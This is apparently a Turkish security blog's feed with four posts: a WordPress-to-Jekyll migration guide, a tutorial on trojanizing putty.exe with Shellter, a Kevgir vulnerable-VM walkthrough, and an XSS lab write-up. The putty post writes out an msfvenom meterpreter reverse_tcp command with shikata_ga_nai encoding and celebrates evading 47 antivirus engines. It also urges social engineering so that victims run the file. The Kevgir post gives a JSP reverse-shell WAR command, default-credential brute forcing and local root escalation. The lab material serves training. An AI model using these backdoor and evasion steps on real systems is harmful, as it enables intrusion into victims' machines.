The blog of Ahmet GÜREL2018-04-15T13:49:21+00:00ahmetgurel.github.ioAhmet GÜRELahmetgurel.yazilim@gmail.comWordpress Blogu Jekyll Taşıma2017-01-13T14:22:00+00:00ahmetgurel.github.io/jekly/programlama%20dilleri/wordpress/wordpress%20blogunuzu%20jekyll%20ta%C5%9F%C4%B1ma/wordpress%20yaz%C4%B1lar%C4%B1n%C4%B1%20markdown%20a%20%C3%A7evirmek/wordpress%20yaz%C4%B1lar%C4%B1n%C4%B1z%20md%20uzant%C4%B1l%C4%B1%20yapmak/2017/01/13/wordpress-blogunuzu-jekly-ta%c5%9f%c4%b1ma<p>Merhabalar,</p>
<p>Wordpressi benim gibi sadece blog tutmak için kullanan arkadaşlar sürekli wordpress güncellemeleri eklentileri vs bir çok uğraşı bulunmakta fakat bunun yerine son zamanlarda<strong> githubkullaniciadi.github.io</strong> ları görmekteyiz.Github username iniz olmak koşuluyla <strong>githubkullaniciadi.github.io </strong>adlı bir repo oluşturup buna Jekyll kurup yayınlayabilirsiniz.Bu yazıda Jekyll kurulumunu anlatmayacağım googleda çok fazla kişi yazmış. <a href="http://aristona.github.io/jekyll-ve-github-pages-kullanarak-kendi-blogumuzu-olusturmak">http://aristona.github.io/jekyll-ve-github-pages-kullanarak-kendi-blogumuzu-olusturmak</a> bunlardan birisi bu şekilde adım adım kurabilirsiniz.Eğer buda zor ve uzun bir uğraş gibi geldiyse bununda basit bir yolunu söyleyeyim Jekyll kurmuş ve kullanmakta olan birinin reposunu indirerek (Örn: https://github.com/ahmetgurel/ahmetgurel.github.io ) onu kendinizi göre düzenledikten sonra kullanıcıadinizla açtığınız <strong>githubkullaniciadi.github.io </strong>reposuna yüklediğiniz direk çalışacaktır.Kurulumu bu şekilde hallettikden sonra gelelim wordpress yazılarınızı Jekyll ye geçirmeye.</p>
<p>Wordpressi uzun yıllar kullanınca biriken bu yazıları ona geçirmek biraz insanı üşendirebilir.Jekyll markdown .md uzantısı kullanmakta <strong>_post</strong> klasöründe bulunmaktadır.</p>
<p><img src="/assets/1.jpg" alt="Jekyll Dizin" /></p>
<p>Şimdi wordpress teki yazılarınızı ilk olarak <strong>Araçlar -> Dışa Aktar -> Yazılar</strong> diyerek xml formatında kaydediyoruz.</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2017/01/2.jpg"><img class="alignnone size-large wp-image-681" src="http://www.gurelahmet.com/wp-content/uploads/2017/01/2-1024x421.jpg" alt="" width="976" height="401" /></a></p>
<p>xml olarak inen dosyamızı artık markdown .md ye çevirmek içinde <strong>wpXml2Jekyll </strong>aracımızı kullanıyoruz. <a href="https://github.com/theaob/wpXml2Jekyll">https://github.com/theaob/wpXml2Jekyll</a> adresinden indirerek xml dosyamızı seçip save post dediğimizde wordpress deki tüm yazılarınız markdown haline çevirmiş olacaksınız.</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2017/01/3.jpg"><img class="alignnone size-full wp-image-682" src="http://www.gurelahmet.com/wp-content/uploads/2017/01/3.jpg" alt="" width="934" height="470" /></a></p>
<p>Artık bu işlem sonunda oluşan markdown .md uzantılı yazılarımızı repomuzdaki <a id="e2a2ff2d1ad978ada529597257972458-2e1be514044c14d4843cc877df018d4929325a34" class="js-navigation-open" title="_posts" href="https://github.com/ahmetgurel/ahmetgurel.github.io/tree/master/_posts">_posts</a> dizinine atarak işlemimizi tamamlamış oluyoruz. Tüm yazılarım artık <a href="https://ahmetgurel.github.io/"> ahmetgurel.github.io</a> adresine aktarmış bulunmaktayız. Not: Yazılarınızda ki resim dosyalarınızı domain üzerine linklendiriyor bunları kaydedip reponuzun içine atarak yollarını değiştirmeniz gerekebilir.</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2017/01/4.jpg"><img class="alignnone size-large wp-image-683" src="http://www.gurelahmet.com/wp-content/uploads/2017/01/4-1024x515.jpg" alt="" width="976" height="491" /></a></p>
<p> </p>
Shellter ile Backdoor Hazırlama ve Sisteme Sızma2017-01-12T14:42:00+00:00ahmetgurel.github.io/backdoor/backdoor%20haz%C4%B1rlama/genel%20g%C3%BCvenlik/msfvenom/msfvenom%20backdoor/shellter/shellter%20ile%20backdoor%20haz%C4%B1rlama%20ve%20sisteme%20s%C4%B1zma/siber%20g%C3%BCvenlik/sisteme%20s%C4%B1zma/s%C4%B1zma%20testi%20ara%C3%A7lar%C4%B1%20(pentest%20tools)/windows%20hack/2017/01/12/Shellter ile Backdoor Hazırlama ve Sisteme Sızma<p>Merhaba,</p>
<p>Bu yazımda bir sisteme sızmak için kullanılan güzel bir yöntemden bahsedeceğim.Sistemde yazılımsal açıklıklardan yararlanmak yerine zararlı bir dosya ile sisteme sızabilirsiniz.Bu zararlı dosyayı bir çok farklı yolla oluşturabilirsiniz.Bilginiz ölçüsünde kendiniz yazabilirsiniz,msfvenom ile kendiniz bir zararlı uygulama oluşturabilirsiniz ya da her hangi bir uygulamaya payload yerleştirebilirsiniz.</p>
<p>Bugün biz bunu yapacağız windowsta ssh bağlantısı için kullanılan Putty.exe programına Payload yerleştirip bununla bir sisteme sızmayı anlatacağım.Bunun dışında msfvenom ile oluşturduğunuz uygulama -e parametresi ile encode ederek antivirüsleri geçmesini sağlanabiliyor fakat genelde bilindiği için bu encode ve payloadlar tamamen bypass etmek zor.</p>
<pre class="lang:default decode:true ">msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.237.128 LPORT=4444 -f exe -o /root/Desktop/zararli.exe -e x86/shikata_ga_nai -i 20</pre>
<p>Yukarıdaki msfvenom komutu ile haberleşeceği ip ve portu belirterek zararlı.exe oluşturarak shikata_ga_nai ile 20 kere encode ettik.Fakat biz bu yazıda bu şekilde yapmayacağız bu ne kadar encode etsekde bir çok antivirüs hem yakalıyor hemde oluşturduğumu zararlı sadece siyah bir cmd ekranı açıyor buda kurbanın hemen kapatması ya da şüphelenerek silmesi anlamına gelmektedir.Bunun için putty.exe seçtik internettten putty.exe yi indirerek ona kendi payloadımızı yerleştireceğiz.Bu aşamadan sonra Sosyal Mühendislik ve diğer yolları kullanarak kurbanın uygulamayı çalıştırmasını sağlamalıyız.</p>
<p>Şimdi gelelim putty.exe ye Payloadımızı yerleştirmeye bunu yine msfvenom ile yapabilmekteyiz.Ya da bunun için başka bir alternatif olan Shellter uygulaması ile yapabilmekteyiz.Shellter windowsda çalışan bir uygulamadır fakat wine ile Linuxta çalıştırılmaktadır.<a href="https://www.shellterproject.com/">https://www.shellterproject.com/</a> adresinden uygulamayı indirebilirsiniz.<a href="http://www.putty.org/">http://www.putty.org/</a> adresindende putty.exe uygulamasını indirebilirsiniz.</p>
<p>Daha sonra aşağıdaki ekran görüntülerindeki gibi yerleştirilecek payload encoder haberleşilecel ip ve port bilgilerini shellter a girerek putty.exe artık bizim hazırladığımız backdoorumuz olacaktır.Her adım ekran görüntülerinde mevcuttur.</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2017/01/WindowsXP-2017-01-12-14-20-22.png"><img class="alignnone size-large wp-image-658" src="http://www.gurelahmet.com/wp-content/uploads/2017/01/WindowsXP-2017-01-12-14-20-22-1024x576.png" alt="" width="976" height="549" /></a></p>
<p> </p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2017/01/2.png"><img class="alignnone size-large wp-image-660" src="http://www.gurelahmet.com/wp-content/uploads/2017/01/2-1024x576.png" alt="" width="976" height="549" /></a></p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2017/01/3.png"><img class="alignnone size-large wp-image-661" src="http://www.gurelahmet.com/wp-content/uploads/2017/01/3-1024x576.png" alt="" width="976" height="549" /></a></p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2017/01/4.png"><img class="alignnone size-large wp-image-662" src="http://www.gurelahmet.com/wp-content/uploads/2017/01/4-1024x576.png" alt="" width="976" height="549" /></a></p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2017/01/5.png"><img class="alignnone size-large wp-image-663" src="http://www.gurelahmet.com/wp-content/uploads/2017/01/5-1024x576.png" alt="" width="976" height="549" /></a></p>
<p>Artık backdoorumuz oluştu.Enter a basarak shellter kapanacaktır.</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2017/01/virüs-total.jpg"><img class="alignnone size-full wp-image-664" src="http://www.gurelahmet.com/wp-content/uploads/2017/01/virüs-total.jpg" alt="" width="974" height="254" /></a></p>
<p>Oluşturduğumuz backdoor virustotal de kontrol ettiğimizde 57 antivirusden 10 tanesi yakayabildi.Bunların dışında bir çok popüler antivirus uygulaması yakayamadı.Özel bir işlem gerçekleştirmeden 47 tane antivirüsü geçmesi gayet başarılı bir sonuç bence shellter uygulaması bu konuda gayet başarılı başka encoder ve işlemler sonucu daha iyi sonuçlar elde edilecektir. NOT: Linux ortamında hazırlandığında daha az antivirus tarafından yakalanmaktadır.Daha iyi sonuçlar alabilirsiniz.</p>
<p>Bundan sonraki kısım oluşturduğumuz uygulamayı kurbanın çalıştırılması bir senaryo ile bu sağlanmalıdır.</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2017/01/Kali-Linux-2.0.0-vm-amd64-2017-01-12-14-24-04.png"><img class="alignnone size-large wp-image-665" src="http://www.gurelahmet.com/wp-content/uploads/2017/01/Kali-Linux-2.0.0-vm-amd64-2017-01-12-14-24-04-1024x576.png" alt="" width="976" height="549" /></a></p>
<p>Metasploitimizi açarak multi handlerı açarak dinleme moduna geçiyoruz ve uygulama çalıştığı anda oturum elde etmeye çalışacağız.</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2017/01/Kali-Linux-2.0.0-vm-amd64-2017-01-12-14-25-11.png"><img class="alignnone size-large wp-image-666" src="http://www.gurelahmet.com/wp-content/uploads/2017/01/Kali-Linux-2.0.0-vm-amd64-2017-01-12-14-25-11-1024x576.png" alt="" width="976" height="549" /></a></p>
<p>Artık her şey tamam sadece uygulayı kurbanımızın indirip çalıştırması gerekmektedir.</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2017/01/WindowsXP-2017-01-12-14-25-18.png"><img class="alignnone size-large wp-image-667" src="http://www.gurelahmet.com/wp-content/uploads/2017/01/WindowsXP-2017-01-12-14-25-18-1024x576.png" alt="" width="976" height="549" /></a></p>
<p>Uygulamayı bu şekilde açıldıktan sonra backdoorumuzu oluştururken haberleşmesi için girdiğimiz ip ve port numaralarıyla haberleşecektir.</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2017/01/Kali-Linux-2.0.0-vm-amd64-2017-01-12-14-25-23.png"><img class="alignnone size-large wp-image-668" src="http://www.gurelahmet.com/wp-content/uploads/2017/01/Kali-Linux-2.0.0-vm-amd64-2017-01-12-14-25-23-1024x576.png" alt="" width="976" height="549" /></a></p>
<p>Gördüğünüz üzere meterperter satırı ile oturum elde ettik.</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2017/01/Kali-Linux-2.0.0-vm-amd64-2017-01-12-14-25-33.png"><img class="alignnone size-large wp-image-669" src="http://www.gurelahmet.com/wp-content/uploads/2017/01/Kali-Linux-2.0.0-vm-amd64-2017-01-12-14-25-33-1024x576.png" alt="" width="976" height="549" /></a></p>
<p>Bilgisayarda antivirus olmaması ya da gerçekleştirdiğimiz işlemler sonucunda bunu yakalayamayan bir antivirus programının hiç bir faydası olmayacaktır.Kurban putty ile ssh bağlanarak her zamanki işlemini yaparken bizde sisteme sızmış oluyoruz.Bunun için güncel bir antivirus kullanmanız bazı durumlarda işinize yarayacaktır.Bilmediğiniz kaynaklardan dosya indirmeyiniz indirdiysenizde kurmadan önce en azından virustotal e yükleyerek kontrol edebilirsiniz.Bu yazıda bende hazır windows xp vardı onu kullandım ama Windows7,10 hiç fark etmez aynı şekilde çalışacaktır.Başka bir yazıda görüşmek üzere her zaman sorularınız için info@gurelahmet.com mail adresinden bana ulaşabilirsiniz.</p>
Kevgir VM Sızma Testi ve Yetki Yükseltme Aşamaları2016-10-26T16:05:00+00:00ahmetgurel.github.io/kevgir%20%C3%A7%C3%B6z%C3%BCmleri/kevgir%20vm%20s%C4%B1zma%20testi%20ve%20yetki%20y%C3%BCkseltme%20a%C5%9Famalar%C4%B1/local%20root%20exploit%20kullan%C4%B1m%C4%B1/siber%20g%C3%BCvenlik/sisteme%20s%C4%B1zma/s%C4%B1zma%20testi/s%C4%B1zma%20testi%20ara%C3%A7lar%C4%B1%20(pentest%20tools)/tomcat%20exploit/yetki%20y%C3%BCkseltme/2016/10/26/kevgir-vm-s%c4%b1zma-testi-ve-yetki-y%c3%bckseltme-a%c5%9famalar%c4%b1<p>Bu yazıda <a href="https://canyoupwn.me/">canyoupwn.me</a> ekibinden <a href="https://twitter.com/1ce7ea">Robin</a>in hazırladığı Kevgir adlı sanal makineye sızarak daha sonra yetki yükseltme aşamaları ile bir sızma testi senaryosu inceleyeceğiz.Öncelikle <a href="https://canyoupwn.me/kevgir-vulnerable-vm/">https://canyoupwn.me/kevgir-vulnerable-vm/ </a>adresinden Kevgiri indirerek bir sanal makinede açıyoruz.Lafı çok uzatmadan konuya gireyim :) Eğer Linux,Nmap ve Metasploit gibi konulara hakim değil iseniz daha önceden hazırlamış olduğum <a href="https://www.exploit-db.com/docs/40408.pdf">Temel Ağ Sızma Testine Giriş</a> dökümanıma göz atıp yazıyı okumanız daha faydalı olur.</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2016/10/0.png"><img class="size-large wp-image-629 aligncenter" src="http://www.gurelahmet.com/wp-content/uploads/2016/10/0-1024x553.png" alt="0" width="976" height="527" /></a></p>
<p>Nmap ile keşif taramasına başlıyoruz.Çalışan servisleri ve versiyonları tespit ettikten sonra bu servisleri ve versiyonları detaylıca araştırarak bir zaafiyet varmı exploit db de yada başka site ve bloglarda bir şey varsa o hedef üzerinden sızmaya çalışılır.Bu makinede birden fazla açıklık bulunmakta fakat ben Tomcat üzerinden gideceğim.</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2016/10/1.png"><img class="size-large wp-image-630 aligncenter" src="http://www.gurelahmet.com/wp-content/uploads/2016/10/1-1024x555.png" alt="1" width="976" height="529" /></a></p>
<p>Metasploiti açarak tomcat ile ilgili auxiliary ve exploitleri arıyoruz.</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2016/10/2.png"><img class="size-large wp-image-631 aligncenter" src="http://www.gurelahmet.com/wp-content/uploads/2016/10/2-1024x554.png" alt="2" width="976" height="528" /></a></p>
<p>İlk olarak <strong>tomcat_mgr_login</strong> auxiliary ile tomcat servisinin default şifrelerini deniyoruz.Amacımız brute force yöntemi ile kullanıcı adı ve şifresini tespit etmek.</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2016/10/3.png"><img class="size-large wp-image-632 aligncenter" src="http://www.gurelahmet.com/wp-content/uploads/2016/10/3-1024x553.png" alt="3" width="976" height="527" /></a></p>
<p>Görüldüğü üzere kullanıcı adı tomcat ve şifresi tomcat olarak tespit ettik.Genelde bir çok servis kurulum sırasındaki default şifreleri kullanmakta ve bu çok büyük riskler oluşturmakta.Mutlaka kurulum sırasında yada sonrasında kullanıcı adı ve şifresini değiştiriniz.</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2016/10/4.png"><img class="size-large wp-image-633 aligncenter" src="http://www.gurelahmet.com/wp-content/uploads/2016/10/4-1024x556.png" alt="4" width="976" height="530" /></a></p>
<p>Kullanıcı adı ve şifresini tespit ettikten sonra<strong> tomcat_mgr_upload</strong> exploitini kullanarak sisteme sızmaya çalışıyoruz.Tabi <strong>192.168.237.137:8080/manager </strong>adresi ile tarayıcıdan tomcat a giriş yaparak shellde atabilirsiniz.Farklı yollar ve yöntemler mevcut.Exploitin çalışması için gerekli parametreleri set ettikten sonra exploitimizi çalıştırıyoruz ve meterpreter e düşmüş bulunmaktayız.</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2016/10/5.png"><img class="size-large wp-image-634 aligncenter" src="http://www.gurelahmet.com/wp-content/uploads/2016/10/5-1024x550.png" alt="5" width="976" height="524" /></a></p>
<p>Şimdi bir başka yol ile web adresi üzerinden bulduğumu kullanıcı adı ve şifre ile login olarak msfvenom ile backdoor oluşturup bu backdoor yardımı ile shell almayı göstereceğim.</p>
<p><strong>msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.237.128 LPORT=4444 -f war > /root/Desktop/shell.war</strong></p>
<p>ile shell.war adında jsp backdoor u oluşturuyoruz.</p>
<p><strong>jar -xvf shell.war </strong>komutu ile shell.war içindekileri dışarı çıkarıp dosyaları görebilmekteyiz. Yükledikten sonra açacağımız jsp dosyasının adı önemli.</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2016/10/1-4.png"><img class="alignnone size-large wp-image-652" src="http://www.gurelahmet.com/wp-content/uploads/2016/10/1-4-1024x576.png" alt="" width="976" height="549" /></a></p>
<p>192.168.237.137:8080/manager/ adresini tarayıcıdan girerek tomcat in web arayüzüne girebiliriz.girişte kullanıcı adı ve şifresi sorulacak biraz önce yukarıda elde ettiğimiz tomcat:tomcar kullanıcı adı ve şifresi ile erişebileceğiz.</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2016/10/2-5.png"><img class="alignnone size-large wp-image-653" src="http://www.gurelahmet.com/wp-content/uploads/2016/10/2-5-1024x576.png" alt="" width="976" height="549" /></a></p>
<p>Giriş yaptıkdan sonra tomcatin içinden wat dosyamızı upload adarak bacdoorumuzu sisteme yüklüyoruz.</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2016/10/3-3.png"><img class="alignnone size-large wp-image-654" src="http://www.gurelahmet.com/wp-content/uploads/2016/10/3-3-1024x576.png" alt="" width="976" height="549" /></a></p>
<p>Dosyamızı yükledikden sonra metasploite girerek backdoorumuzu çalıştırmadan önce gerekli nodulümüze bağlanacağımız bacdoor payloadımızı ve bilgilerimizi giriyoruz.</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2016/10/4-2.png"><img class="alignnone size-large wp-image-655" src="http://www.gurelahmet.com/wp-content/uploads/2016/10/4-2-1024x576.png" alt="" width="976" height="549" /></a></p>
<p>Bu noktadan sonra tek yapmamız gereken 192.168.237.137:8080/shell/hoxafoxvkhn.jsp adresimizi tarayıcadan girerek backdoorumuzu çalıştırıp metasploit ile shell açmak.</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2016/10/5-3.png"><img class="alignnone size-large wp-image-656" src="http://www.gurelahmet.com/wp-content/uploads/2016/10/5-3-1024x576.png" alt="" width="976" height="549" /></a></p>
<p>Yukarıda gördüğünüz gibi shell açıldı.Bu senaryoda hem metasploit modülü ile hemde kendi backdoorumuzu web arayüzünden yükleyerek iki farklı yoldan shell aldık.Bu aşamadan sonra Privileges Escalation ve Post Exploitation aşamaları gerçekleştirmemiz gerekmektedir.Şimdi dönelim meterpreter komut satırından sonra yapacaklarımıza.</p>
<p>Meterpreter komut satırında shell yazarak linux komut satırına düşüyoruz.Fakat buradaki komut satırı etkilişimli değil.Bu demek oluyor ki girdi bekleyen linux komutlarını çalıştıramıyoruz.Mesala kullanıcı değiştirirken <strong>sudo su </strong>komutunu girdikten sonra şifre girdisi istiyor bu shell buna imkan vermiyor.</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2016/10/6.png"><img class="size-large wp-image-635 aligncenter" src="http://www.gurelahmet.com/wp-content/uploads/2016/10/6-1024x554.png" alt="6" width="976" height="528" /></a></p>
<p><strong>python -c ‘import pty; pty.spawn(“/bin/sh”)’ </strong>yazarak shellimizi etkileşimli shelle çeviriyoruz.Resimdede gördüğünüz gibi artık $ işareti geldi.home dizinine giderek orada user ve admin olarak iki kullanıcı olduğunu gördük.Şimdi buradaki admin kullanıcısı aklınızı karıştırmasın.Ali,Ahmet gibi bir kullanıcı yetkili bir kullanıcı değil linuxta en yetkili kullanıcı root tur.Bu sistemdede hedefimiz root olmak.Şimdi burdaki admin kullanıcısına geçmeye çalışacağız.Aynı tomcatde default şifreler denendiği gibi admin kullanıcısının şifreside en çok kullanılan bir kaç şifre denedim.123456,password,admin gibi bunlardan admin admin kullanıcısının şifresi ise ve admine geçtik.</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2016/10/7.png"><img class="size-large wp-image-636 aligncenter" src="http://www.gurelahmet.com/wp-content/uploads/2016/10/7-1024x553.png" alt="7" width="976" height="527" /></a></p>
<p>Şimdi uname -a komutu ile sistemin çekirdek bilgisini öğrendik.14.04.1 Ubuntu çalışmakta.Şuan admin kullanıcısındayız yapacağımız işlemler kısıtlı bunun için root kullanıcısına geçmemiz gerekmekte.Bunun içinde Local Root Exploitler bulunmakta şansımıza var ise bu exploit türünü çalıştırırak bulunduğunuz kullanıcıdan root kullanıcısına geçmemizi sağlamakta.</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2016/10/8.png"><img class="size-large wp-image-637 aligncenter" src="http://www.gurelahmet.com/wp-content/uploads/2016/10/8-1024x552.png" alt="8" width="976" height="526" /></a></p>
<p>Googleda şöyle bir arama yaparak Local Root Exploitimizi buluyoruz.</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2016/10/9.png"><img class="size-large wp-image-638 aligncenter" src="http://www.gurelahmet.com/wp-content/uploads/2016/10/9-1024x553.png" alt="9" width="976" height="527" /></a></p>
<p> </p>
<p>Bulduğumuz exploiti kopyalayarak shell aldığımız terminalde bir .c dosyası açarak içine yapıştırıyoruz.Yada başa bir şekilde bu exploit dosyasını shell aldığımız makinaya yüklüyoruz.</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2016/10/10.png"><img class="size-large wp-image-639 aligncenter" src="http://www.gurelahmet.com/wp-content/uploads/2016/10/10-1024x554.png" alt="10" width="976" height="528" /></a></p>
<p>Burada <strong>vim ile localexploit.c</strong> adında bir dosya oluşturuyoruz ve içine kopyaladığımız exploiti yapıştırıyoruz.Yapıştırıken CTRL+SHIFT+V tuş kombinasyonunu kullanabilirsiniz.</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2016/10/11.png"><img class="size-large wp-image-640 aligncenter" src="http://www.gurelahmet.com/wp-content/uploads/2016/10/11-1024x552.png" alt="11" width="976" height="526" /></a></p>
<p>Yapıştırdıktan sonra vimde ESC ye basarak :wq komutu ile dosyamızı kaydetip çıkıyoruz.</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2016/10/12.png"><img class="size-large wp-image-641 aligncenter" src="http://www.gurelahmet.com/wp-content/uploads/2016/10/12-1024x552.png" alt="12" width="976" height="526" /></a></p>
<p>Dosyamızı kaydetip çıktıktan sonra <strong>gcc localexploit.c</strong> komutu ile c kodumuzu derliyoruz.Ve bize derlenmiş olarak <strong>a.out</strong> çıktısını veriyor.Bunuda <strong>./a.out</strong> komutu ile çalıştırdığımızda sistemde root kullanıcısına geçiyoruz.Bundan sonra sistemde istediğiniz her şeyi yapabilirsiniz.Sınırsız yetkiye sahipsiniz.</p>
<p> </p>
<p> </p>
XSS(Cross Site Scripting) Nedir? ve XSS Lab Uygulaması (Web for Pentester)2016-10-25T17:13:00+00:00ahmetgurel.github.io/dom%20xss/siber%20g%C3%BCvenlik/s%C4%B1zma%20testi%20ara%C3%A7lar%C4%B1%20(pentest%20tools)/web%20for%20pentester/web%20for%20pentester%20xss%20%C3%A7%C3%B6z%C3%BCmleri/web%20pentest/web%20security/web%20uygulama%20g%C3%BCvenli%C4%9Fi/xss/xss%20stored/2016/10/25/xsscross-site-scripting-nedir-ve-xss-lab-uygulamas%c4%b1-web-for-pentester<blockquote><b>Cross site scripting</b> (<b>XSS</b>), bilgisayar güvenlik açığı. HTML kodlarının arasına istemci tabanlı kod gömülmesi yoluyla kullanıcının tarayıcısında istenen istemci tabanlı kodun çalıştırılabilmesi olarak tanımlanır.</blockquote>
<h1 id="firstHeading" class="firstHeading" lang="en"></h1>
<p> </p>
<p>Cross-Site Scripting (XSS) OWASP Top 10 listesinde bulunmaktadır.Bu yazımda Web for Pentester uygulamasının XSS Bölümlerini çözeceğim. <a href="https://pentesterlab.com/exercises/web_for_pentester/">https://pentesterlab.com/exercises/web_for_pentester/</a> Linkinden ISO dosyasını indirerek sanal makinenizde açarak sanal makinanın IP adresi ile tarayıcınızdan uygulamaya erişebilirsiniz.</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2016/10/1-0.png"><img class="size-large wp-image-589 aligncenter" src="http://www.gurelahmet.com/wp-content/uploads/2016/10/1-0-1024x538.png" alt="1-0" width="976" height="513" /></a></p>
<p>Web for Pentesterın ana sayfası görüldüğü gibidir.Bir çok web zaafiyetini öğretmek için hazırlanmıştır.Sonraki yazılarımda diğer zaafiyetlerede değinmeye çalışacağım.Bu yazı için XSS de bulunan 9 örneği çözeceğiz.</p>
<p><strong>XSS Türleri:</strong></p>
<p>Başlamadan önce XSS Türleri hakkında kısaca bilgi vereyim.3 Çeşit XSS Türü vardır.1- Reflected XSS 2- Stored/Persistent XSS 3- Dom XSS</p>
<ol>
<li><strong>Reflected XSS: </strong>Kullanıcının girilmesi beklenen parametre yerine Javascript kodu girerek bunu ekrana yansıtması ile tespit edilebilen XSS çeşitidir.</li>
<li><strong>Stored/Persistent XSS: </strong>Adında anlaşılacağı üzere kalıcı XSS türüdür.Bu sefer girilen payloadlar anlık olarak yansımaz bir veritabanına yada başka bir yere kayıt edilir daha sonradan ziyaret edildiğinde çalışan XSS çeşitidir.</li>
<li><strong>Dom XSS: </strong>Dom (Document Object Model) XSS Dom lardan kaynaklanan XSS dir.Gemelde # işaretinden sonra payload denenmesi ve sayfa yenilendiğinde alert alındığında DOM XSS var denilen XSS açıklığıdır.İşin teorik bilgisi DOM nesnesinden kaynaklandığı için en tehlikeli XSS türü olarak anılmaktadır.Derinlemesine öğrenmek için <a href="https://twitter.com/Om3rCitak">Ömer</a>'in <a href="http://omercitak.com/dom-based-xssi-anlamak/">http://omercitak.com/dom-based-xssi-anlamak/</a> yazısına mutlaka göz atın derim güzel bir yazı olmuş.</li>
</ol>
<p><strong>XSS ile Neler Yapılabilir?</strong></p>
<p>XSS ile javascript kodları çalıştırabilmekteyiz.Burada zararlı kodlar kullanıldığında Cookie çalma,sayfanın içinde başka sayfaya yönlendirme.Sitemize zararlı kodlar gömerek istedikleri başka saldırılar gerçekleştirebilirler.Web dünyasında önemli ve kritik açıklıklar arasında yer almaktadır.BeEF (The Browser Exploitation Framework Project) ile XSS açıklıklarını sömürebilirsiniz.</p>
<p>Gelelim şimdi uygulama kısmına XSS Tespit edilmesi ve sayfada alert görmek hedefimiz.Bunun için Web for Pentesterın XSS bölümlerine başlıyoruz.</p>
<p> </p>
<p><strong>Example 1:</strong></p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2016/10/1-1.png"><img class="size-large wp-image-592 aligncenter" src="http://www.gurelahmet.com/wp-content/uploads/2016/10/1-1-1024x522.png" alt="1-1" width="976" height="498" /></a></p>
<p> </p>
<p>Kullanıcıdan beklenen name parametesi için bir deneme yaptık.Bizim payload yazarken kullanacağımız herhangi bir şey filtrelenmiş mi diye baktık ve hiç biri bu örnek için filtrelenmemiş.Buraya bir payload yazarak XSS tespiti var mı yok mu karar verebiliriz.</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2016/10/1-2.png"><img class="size-large wp-image-593 aligncenter" src="http://www.gurelahmet.com/wp-content/uploads/2016/10/1-2-1024x299.png" alt="1-2" width="976" height="285" /></a></p>
<p>Burada <strong><script>alert(1)</script></strong> payloadımızı girerek ekrana alerti bastırarak XSS imizi bulmuş bulunmaktayız.alertin içine isim yazı yazmak isterseniz <strong><script>alert(“XSS”)</script></strong> tarzında yazabilirsiniz.Fakat bazen tırnak işaretlerinin filtrelenmesinden dolayı direk sayı girerek tırnak kullanmadan alert almak daha sağlıklı sonuçlar vermektedir.</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2016/10/1-3.png"><img class="size-large wp-image-594 aligncenter" src="http://www.gurelahmet.com/wp-content/uploads/2016/10/1-3-1024x531.png" alt="1-3" width="976" height="506" /></a></p>
<p> </p>
<p>Sayfa kaynağını görüntüle diyerek yazdığımız payloadın kodlarda nasıl göründüğüne bakarak daha etkili sonuçlar alabiliriz.</p>
<p><strong>Example 2:</strong></p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2016/10/2-0.png"><img class="size-large wp-image-597 aligncenter" src="http://www.gurelahmet.com/wp-content/uploads/2016/10/2-0-1024x244.png" alt="2-0" width="976" height="233" /></a></p>
<p>Bir önceki örnekteki payloadımızı girdiğimizde alert alamadık ve yazdığımız payloadın script tagları giderek ekrena Hello alert(1) yazdı.Yazılımcı arka tarafta script kodlarını filtrelemiş.</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2016/10/2-1.png"><img class="size-large wp-image-598 aligncenter" src="http://www.gurelahmet.com/wp-content/uploads/2016/10/2-1-1024x520.png" alt="2-1" width="976" height="496" /></a></p>
<p>Bunu sayfa kaynağındada görebilmekteyiz.</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2016/10/2-2.png"><img class="size-large wp-image-599 aligncenter" src="http://www.gurelahmet.com/wp-content/uploads/2016/10/2-2-1024x236.png" alt="2-2" width="976" height="225" /></a></p>
<p>Payload:<strong> <SCRIPT>alert(1)</SCRIPT></strong> olarak yazıp denediğimizde pop-up geldi.Yazılımcı sadece küçük script tagını filtrelemiş biz büyük girdiğimizde alertimizi alabildik.</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2016/10/2-3.png"><img class="size-large wp-image-600 aligncenter" src="http://www.gurelahmet.com/wp-content/uploads/2016/10/2-3-1024x177.png" alt="2-3" width="976" height="169" /></a></p>
